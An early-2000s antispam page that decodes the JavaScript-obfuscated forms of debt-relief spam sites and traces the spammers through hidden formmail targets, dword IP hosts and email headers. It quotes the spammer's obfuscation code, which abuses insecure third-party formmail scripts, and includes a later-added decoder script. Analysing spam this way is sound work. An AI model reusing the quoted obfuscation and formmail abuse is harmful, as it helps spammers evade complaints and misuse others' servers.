- A form with JavaScript content that accesses other sites
- Some pointers from news.admin.net-abuse.email participants
- A site that accesses another site: How to eliminate "Eliminate Your Debt Today at .30-.50 Cents on The Dollar.."
The following is the form on the spammer's Web page. It includes JavaScript.
Bad credit, Poor credit, No CREDIT? No Problem!
Debt consolidation services include credit counseling, credit card counseling, debt management, loan consolidation, bill consolidation, credit counseling, medical bill consolidation and much more.
501 (c) 3 Non Profit Organization
Make a fresh start! Dramatically reduce your interest expense! Significantly lower your monthly payments! Begin to re-establish a good credit rating! Ask About Our Loan Programs
To lean more about this No Obligation, Free debt analysis, just fill out the short form below
Please be patient for form to submit...
Permanently Remove yourself from future mailings below:
Email Address:
[irrelevant stuff deleted]
<SCRIPT language=JavaScript>
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,68,101,98,116,76,101,97,100,49,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,102,101,114,114,101,114,34,32,118,97,108,117,101,61,34,49,48,53,34,62));
</SCRIPT>
<p align="center"><input type="submit" value="Submit"
name="B1"><input type="reset" value="Reset" name="B2"></p>
</form>
<div align="center"><br><p><font size="-1">Please be patient
for form to submit...</font></p></div>
<!-- Opt-Out starts here-->
<br><br><br><br><br><hr><br><br><br><br><br>
<div align="center">
<b><font face="Verdana" size="2"><font color="#FF0000">Permanently
Remove</font><font color="#000000"> yourself from future mailings
below:
<SCRIPT language=JavaScript>
document.write(String.fromCharCode(60,102,111,114,109,32,109,101,116,104,111,100,61,34,112,111,115,116,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,97,113,117,105,110,97,115,46,99,111,109,47,99,103,105,45,98,105,110,47,102,111,114,109,109,97,105,108,46,112,108,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,100,105,114,101,99,116,34,32,118,97,108,117,101,61,34,104,116,116,112,58,47,47,51,53,49,49,57,57,49,55,55,52,47,112,112,99,51,47,116,104,97,110,107,121,111,117,46,104,116,109,108,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,99,105,112,105,101,110,116,34,32,118,97,108,117,101,61,34,70,97,117,115,116,105,110,111,80,85,49,48,64,99,97,110,97,100,97,46,99,111,109,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,82,101,109,111,118,97,108,50,34,62));
</SCRIPT>
[more irrelevant material deleted]
</body>
</html>
The first block of String.fromCharCode doesn't reveal anything interesting. But here's what to do with the rest. Copy the comma-separated string of numbers and paste it into Microsoft Excel.
Use DATA/TEXT-TO-COLUMNS to put one number into each column, using the comma as the field delimiter.
60 102 111 114 109 32 109 101 116 104 111 100 61 34 112 111 115 116 34 32 97 99 116 105 111 110 61 34 104 116 116 112 58 47 47 119 119 119 46 97 113 117 105 110 97 115 46 99 111 109 47 99 103 105 45 98 105 110 47 102 111 114 109 109 97 105 108 46 112 108 34 62
Next, put =CHAR() under each number. If 60 is in A1, put =CHAR(A1) into cell B1. Copy across the board. Bingo.
< f o r m m e t h o d = " p o s t " a c t i o n = " h t t p : / / w w w . a q u i n a s . c o m / c g i - b i n / f o r m m a i l . p l " >
Continuing,
60 105 110 112 117 116 32 116 121 112 101 61 34 104 105 100 100 101
110 34 32 110 97 109 101 61 34 114 101 100 105 114 101 99 116 34 32 118
97 108 117 101 61 34 104 116 116 112 58 47 47 51 53 49 49 57 57 49 55 55
52 47 112 112 99 51 47 116 104 97 110 107 121 111 117 46 104 116 109 108
34 62
< i n p u t t y p e = " h i d d e n " n
a m e = " r e d i r e c t " v a l u e = " h t t p : / /
3 5 1 1 9 9 1 7 7 4 / p p c 3 / t h a n k y o u . h t m l " >
(This is just Vortexwebzone.com, as you can find by pasting it into
your browser.)
60 105 110 112 117 116 32 116 121 112 101 61 34 104 105 100 100 101
110 34 32 110 97 109 101 61 34 114 101 99 105 112 105 101 110 116 34 32
118 97 108 117 101 61 34 70 97 117 115 116 105 110 111 80 85 49 48 64 99
97 110 97 100 97 46 99 111 109 34 62
< i n p u t t y p e = " h i d d e n " n
a m e = " r e c i p i e n t " v a l u e = " F a u s t i n o
P U 1 0 @ c a n a d a . c o m " >
Send a complaint to canada.com
60 105 110 112 117 116 32 116 121 112 101 61 34 104 105 100 100 101
110 34 32 110 97 109 101 61 34 115 117 98 106 101 99 116 34 32 118 97 108
117 101 61 34 82 101 109 111 118 97 108 50 34 62
< i n p u t t y p e = " h i d d e n " n
a m e = " s u b j e c t " v a l u e = " R e m o v a l 2 " >
Some pointers from news.admin.net-abuse.email
By the way, if you just want to download a page, say
"http://vortexwebzone.com/ppc3/dbt/O1234.JS"
create a small web page on your hard drive, say - one line:
[a href="http://vortexwebzone.com/ppc3/dbt/O1234.JS"]get it[/a]
(change the square brackets to angle brackets - I didn't use
angle brackets so this will not affect your mail reader if it is
HTML aware) and load it (e.g. Netscape, FILE|OPEN_FILE).
Then *right* click on the "get it" link item and choose to save
the link to disk (or whatever your browser uses as its terminology).
That way you can download the file, even if putting the address in
the location bar does not work. You can then load it into NOTEPAD,
say, safely to examine it.
You mention that you did see that the submission form accessed
"nebula.fi" (from something that logs connections?) - that was due
to the formmail used by the submission form (hidden in the separate
JavaScript module). It could have been this or one of two other
sites with insecure formmail (emailing) scripts (the JavaScript
file that is included randomly chooses one of three insecure
mailer scripts to use).
Regards from:
[withheld upon request]
William A. Levinson <wlevinso@ix.NOSPAM4MEnetcom.com> wrote:
> http://vortexwebzone.com/ppc3/dbt/?cxo "Financial Independence Today"
> spam. (Assuming it's still up when you view it, heh heh heh. Well, the
> relevant parts are on my new antispam page.) VERY clever. It used to be
> that you could view the page's source code and complain to all the
> mailto: addresses inside. This one doesn't have any. It uses JavaScript
> to generate the mailto: contacts from ASCII code letters.
Good job in decoding the form (though there are other ways to do it
... such as a QBasic programme to convert ASCII codes to letters, or conversion
of 60,32,45,.... to &#60;&#32;&#45;... (do a global search
and replace of the comma with ";&#" and then put in the &# at the
front and the semi-colon at the end) and view that string in an HTML capable
programme ... numerical HTML entities are coded as &#xx; where xx is
the decimal ASCII code for the character and can appear in HTML, and browsers
will handle the decoding automatically).
There are lots of ways of converting decimal ascii values to characters. Good that you found one that you can use.
However ...
For http://vortexwebzone.com/ppc3/dbt/?cxo I get a frameset. [frameset
rows="100%,*"]
(so the first frame should take up the entire page and the second is
hidden)
[title]Bad credit?[/title]
with two frames (watch the 0 vs O and 1 vs l) O10l.html, 0lO1.html
The first frame includes:
Something you didn't mention:
document.write(String.fromCharCode(32,60,83,67,82,73,80,84,32,83,
82,67,61,34,79,49,50,51,52,46,74,83,34,62,60,47,83,67,82,
73,80,84,62))
which decodes to:
[SCRIPT SRC="O1234.JS"][/SCRIPT]
(which indicates there is a hidden JavaScript module in this other file)
(in JavaScript, [script src=...][/script] will cause the referenced file to load and run right there)
This module (O1234.JS) does a couple of things.
===============================================
First, it randomly chooses one of three formmail scripts and writes
the following to the web page as it is loading (well, it writes one
of the following three - which one? It is randomly chosen).
First Choice:
[form action="http://www.saunalahti.fi/cgi-bin/FormMail"
method="POST" name="form" onsubmit="return check();"]
Second Choice:
[form action="http://ti89-fr.virtualave.net/cgi-bin/formmail-vf.pl"
method="POST" name="form" onsubmit="return check();"]
Third Choice:
[form action="http://www.nebula.fi/cgi-bin/formmail.cgi" method="POST"
name="form" onsubmit="return check();"]
(even if you get one of the formmail sites to block him, two thirds
of his junk still works - and if you manage to see the part that
is decoded for your visit, you may see only one of the form actions, not all
three - I just tried the site ... for me, it chose the nebula.fi
formmail script - but the JavaScript code randomly chooses a number and uses that
to decide which action to write to the page - I used a packet capture
programme, TCPDUMP (Linux), to capture the output to verify that it did use
one of these scripts)
Then it writes the code:
[input type="hidden" name="redirect"
value="_url_thankyou.html"]
{here _url_ is the current directory location - it is a JavaScript
variable, "url," taken from the URL of the page - that way,
the spammer can move his site to a new location and not have
to change anything here manually - the code will automatically be using
the url of the new location without his having to change the code
on the page}
[input type="hidden" name="recipient" value="LanaJZS4@apexmail.com"]
(the packet capture verified that this recipient value was sent as part
of the submission)
OK ... that is the JavaScript module ... which does the above.
(the check() function just checks that you have entered a phone number)
==============================================================
Then there is more javascript written in the page, as you discovered:
One section setting up some variables:
[input type="hidden" name="subject" value="DebtLead1"]
[input type="hidden" name="referrer" value="105"]
Then there is an ending [/form] tag (after some fields to fill in)
to end the submission form.
---------------------------
Then one DOES find the script you indicated:
But there's more ... another line ...
"Permanently Remove yourself from future mailings below:" (title)
[form method="post" action="http://www.aquinas.com/cgi-bin/formmail.pl"]
[input type="hidden" name="redirect" value="http://3511991774/ppc3/thankyou.html"]
[input type="hidden" name="recipient" value="FaustinoPU10@canada.com"]
and another line which is decoded and written:
[input type="hidden" name="subject" value="Removal2"]
This second form is the "remove your address from my spam" form.
(What about this "http://3511991774/ppc3/thankyou.html"?
Well, vortexwebzone.com is at IP address 209.84.189.222
which is precisely what the decimal number, 3511991774_decimal,
is in base_256 - this is just a page to which you are redirected
after submitting the removal form.
You see that the submission form also redirects ... this is used
by many scripts to redirect you to a thank_you_for_submitting
page after you click the submit button.
There appear to be two thank you pages:
http://vortexwebzone.com/ppc3/dbt/thankyou.html and
http://vortexwebzone.com/ppc3/thankyou.html
But they both (there really are two pages! I checked them both)
are the same:
"Thank you for your submission."
(well, I lied ... they are not the same ... one has a different
background colour, apparently...))
=======================================================
You discovered the second form - the removal form.
However, the setup for the submission form is contained in
http://vortexwebzone.com/ppc3/dbt/O1234.JS
(a separate JavaScript module that you have to load and decode)
(yes ... they are becoming more and more determined that you
NOT locate them; alert the system whose formmail they are
abusing; etc.)
(there are two forms ... one ending with [/form] but you won't find
any [form] section starting it unless you look in the JavaScript
module file, the *.JS file that is loaded - it is followed by the
removal form whose code is on the page and which you found)
So ... canada.com for the removal email address (removal form)
but LanaJZS4@apexmail.com for the spammer's drop box (where
he collects the submissions) and four folks with insecure
formmail scripts that the spammer is abusing (one for the removal
and three for the submission which the spammer appears to consider
more important).
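The two decoding chores described above, the =CHAR() trick for the String.fromCharCode() numbers and the base-256 reading of 3511991774, can be done in one small script run offline with Node.js. This is an added example, not code from the page or from any of the correspondents quoted on it; SAMPLE_SCRIPT is constructed from the three fromCharCode() lines of the removal form quoted above, and the helper names are assumptions.

```javascript
// Added example (not from the page): undo String.fromCharCode() obfuscation
// offline and recover the hidden form fields and dword-encoded hosts.
// SAMPLE_SCRIPT is constructed from the three fromCharCode() lines of the
// removal form quoted on the page; the helper names are assumptions.
const SAMPLE_SCRIPT = `
document.write(String.fromCharCode(60,102,111,114,109,32,109,101,116,104,111,100,61,34,112,111,115,116,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,97,113,117,105,110,97,115,46,99,111,109,47,99,103,105,45,98,105,110,47,102,111,114,109,109,97,105,108,46,112,108,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,100,105,114,101,99,116,34,32,118,97,108,117,101,61,34,104,116,116,112,58,47,47,51,53,49,49,57,57,49,55,55,52,47,112,112,99,51,47,116,104,97,110,107,121,111,117,46,104,116,109,108,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,99,105,112,105,101,110,116,34,32,118,97,108,117,101,61,34,70,97,117,115,116,105,110,111,80,85,49,48,64,99,97,110,97,100,97,46,99,111,109,34,62,13,10));
`;

// Every String.fromCharCode(n,n,...) call becomes the text the spammer's page
// would have document.write()n; the trailing 13,10 (CR LF) is dropped.
function decodeFromCharCode(scriptText) {
  const call = /String\.fromCharCode\(([\d,\s]+)\)/g;
  const tags = [];
  let m;
  while ((m = call.exec(scriptText)) !== null) {
    const codes = m[1].split(",").map((s) => parseInt(s.trim(), 10));
    tags.push(String.fromCharCode(...codes).replace(/\r?\n$/, ""));
  }
  return tags;
}

// The form action plus every hidden name="..." value="..." pair: the
// formmail host, the drop-box recipient and the redirect, all in one place.
function extractFormFields(tags) {
  const fields = {};
  for (const tag of tags) {
    const action = tag.match(/<form\b[^>]*\baction="([^"]*)"/i);
    if (action) fields.action = action[1];
    const hidden = tag.match(/<input\b[^>]*\bname="([^"]*)"[^>]*\bvalue="([^"]*)"/i);
    if (hidden) fields[hidden[1]] = hidden[2];
  }
  return fields;
}

// A "dword" host such as 3511991774 is the IPv4 address read in base 256;
// >>> keeps the shifts unsigned so the top octet is not sign-extended.
function dwordToDotted(dword) {
  const v = Number(dword);
  if (!Number.isInteger(v) || v < 0 || v > 0xffffffff) {
    throw new RangeError(`not a 32-bit dword: ${dword}`);
  }
  return [24, 16, 8, 0].map((shift) => (v >>> shift) & 0xff).join(".");
}

// Rewrite http://<dword>/... with the dotted host so it is readable at a glance.
function normalizeDwordUrl(url) {
  return url.replace(/^(https?:\/\/)(\d+)(?=[/:?#]|$)/i,
    (_, scheme, dw) => scheme + dwordToDotted(dw));
}

const sampleFields = extractFormFields(decodeFromCharCode(SAMPLE_SCRIPT));
console.log(sampleFields, normalizeDwordUrl(sampleFields.redirect));
```

The same dwordToDotted() reading applies to the 1093522818 and 3516097042 hosts in the last section of this page, which the author resolved with PING.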
Hi Uncle Rom,
I read your page about tracing e-mail form spams with delight, especially
because your example spammer
("Bad credit, Poor credit, No CREDIT?") is an old enemy of mine.. :-))
Your Excel-method is nice. Here is how I do it:
Insert
var fso = new ActiveXObject("Scripting.FileSystemObject");
var a = fso.CreateTextFile("C:\\output.txt", true);
at the start of the script section. This will open the text-file 'output.txt'.
Then replace every 'document.write' with 'a.writeline'.
At the end you can close the file, if you want: 'a.Close()'
The example from your website would then look like this:
<SCRIPT language=JavaScript>
var fso = new ActiveXObject("Scripting.FileSystemObject");
var a = fso.CreateTextFile("C:\\output.txt", true);
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,68,101,98,116,76,101,97,100,49,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,102,101,114,114,101,114,34,32,118,97,108,117,101,61,34,49,48,53,34,62));
a.writeline(String.fromCharCode(60,102,111,114,109,32,109,101,116,104,111,100,61,34,112,111,115,116,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,97,113,117,105,110,97,115,46,99,111,109,47,99,103,105,45,98,105,110,47,102,111,114,109,109,97,105,108,46,112,108,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,100,105,114,101,99,116,34,32,118,97,108,117,101,61,34,104,116,116,112,58,47,47,51,53,49,49,57,57,49,55,55,52,47,112,112,99,51,47,116,104,97,110,107,121,111,117,46,104,116,109,108,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,99,105,112,105,101,110,116,34,32,118,97,108,117,101,61,34,70,97,117,115,116,105,110,111,80,85,49,48,64,99,97,110,97,100,97,46,99,111,109,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,82,101,109,111,118,97,108,50,34,62));
a.Close()
</SCRIPT>
If you 'execute' this in your browser you will get the following 'output.txt' :
----------
<input type="hidden" name="subject" value="DebtLead1">
<input type="hidden" name="referrer" value="105">
<form method="post" action="http://www.aquinas.com/cgi-bin/formmail.pl">
<input type="hidden" name="redirect" value="http://3511991774/ppc3/thankyou.html">
<input type="hidden" name="recipient" value="FaustinoPU10@canada.com">
<input type="hidden" name="subject" value="Removal2">
----------
Might be a bit faster...
BTW: Here is a nice link for 'translating' IP-numbers
http://www.fichtner.net/tools/ip2dword/
Keep on the good work...
"Hans from Berlin"
How to eliminate "Eliminate Your Debt Today at .30-.50 Cents on The Dollar.."
Some humor first:
> Are You Suffering with Debt?
No, I'm suffering from too much UCE
> Can't Sleep In Because of Harassing Phone Calls?
No, harassment by spammers is the problem.
> Or do you just want to reduce and pay off your all credit card bills?
I want to reduce spam.
> We can eliminate up to 60% of your debt through negotiations!
We can eliminate you... here goes.
Here are the relevant parts of his source code:
Return-Path: <steph@dedicatedisp.com>
Received: from TmpStr ([65.45.213.134])
Tracing route to 65-45-213-134.customer.algx.net [65.45.213.134]
by motown (Earthlink/Netcom Mail Service) with SMTP id tm43cm.pa8.37tiu50
for < >; Fri, 27 Jul 2001 17:55:50 -0700 (PDT)
Reply-To: "Steph"<steph@dedicatedisp.com>
From: "Steph"<steph@dedicatedisp.com>
To: "" < >
Organization:
X-Priority: 1
X-MSMail-Priority: High
Subject: Eliminate Your Debt Today at .30-.50 Cents on The Dollar..
Sender: "Steph"<steph@dedicatedisp.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Fri, 27 Jul 2001 17:51:30 -0700
Message-Id: <200107271755.tm43cm.pa8.37tiu50@motown>
X-Mozilla-Status: d001
X-Mozilla-Status2: 00000000
X-UIDL: tm43cn.pa8.37tiu50.0
[deleted]
<p align="center"><font face="Verdana" size="2">*This does not
apply to home or auto loans</font>.</p>
<p align="center"><font face="Verdana" size="2"><b>Our process
is successful almost 100% of the time!</b></font> </p>
<p align="center">Want more information? -- <a
href="http://1093522818"><font color="#003399">CLICK
HERE</font></a></p>
<p align="center"> </p>
<p align="center"><a href="mailto:bluskytrader@yahoo.com"><font
color="#003399">unsubscribe</font></a></p>
</body>
</html>
PING 1093522818 to get his IP address, 65.45.213.130
TRACEROUTE (how convenient):
Tracing route to 65-45-213-130.customer.algx.net [65.45.213.130]
so you forward his spewage to postmaster and abuse "at" algx.net. But you're not done...
Fill in his form with enough gibberish to keep his system from rejecting
it for unfilled fields. Press Submit. (Repeat if necessary to get the
necessary information.) Doing this accesses yet another domain; you'll
see it in the lower left-hand corner of Netscape Communicator.
3516097042
Ping it to get the IP address; it's Ezdebtsolutions.
Tracing route to 209.147.98.18 over a maximum of 30 hops
  1   180 ms   186 ms   195 ms  srv7-5-16.nwr2.bd.ans.net [207.205.234.158]
  2   175 ms   190 ms   200 ms  gw1.nwr2.bd.ans.net [207.205.234.252]
[deleted]
 12   378 ms   339 ms   420 ms  Interwrx.t3-2-1-0.ar2.DEN2.gblx.net [64.212.41.66]
 13   259 ms   259 ms   289 ms  itchy.interwrx.com [209.210.172.34]
 14   285 ms   280 ms   300 ms  209.147.98.18
Trace complete.
and it's, "Adios!"
"Spam Delenda Est" antispam home page